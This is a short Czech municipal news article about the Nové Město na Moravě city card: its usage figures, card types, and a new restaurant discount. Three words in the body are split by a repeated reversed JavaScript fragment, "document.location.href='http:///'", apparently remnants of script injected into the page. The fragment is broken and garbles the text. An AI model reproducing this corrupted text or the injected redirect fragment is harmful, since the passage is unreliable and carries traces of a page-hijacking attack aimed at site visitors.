Rainbow page separator

Novoměstskou kartu čeká další rozšíření nabídky

Úterý, 29. března 2016

Radnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / S rozšířením nabídky takzvané Novoměstské karty do budoucna počítá tamní radnice. Aktuální novinkou je, že prostřednictvím karty je možné uplatnit pětiprocentní slevu při platbě v restauraci kulturního domu K club.
Novoměstská karta funguje dva roky, v současnosti je ve městě využíváno 758 těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to karet. Více než polovina z nich jsou karty červené, což znamená, že jejich držitelé jsou obyvatelé starší 18 let věku, zbytek tvoří karty „seniorské“ žluté a zelené karty pro děti.
Nejčastěji je Novoměstská karta využívána v hromadné au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusové dopravě a při vstupu do Městských lázní. Lidé po ní sahají také při čerpání různých výhod, které jejím držitelům nabízejí městské organizace. Jde o slevy na kulturní akce, školné v mateřských školkách, obědy ve školní jídelně či nižší poplatky za družinu, knihovnu, kroužky v domě dětí či výuku v umělecké škole.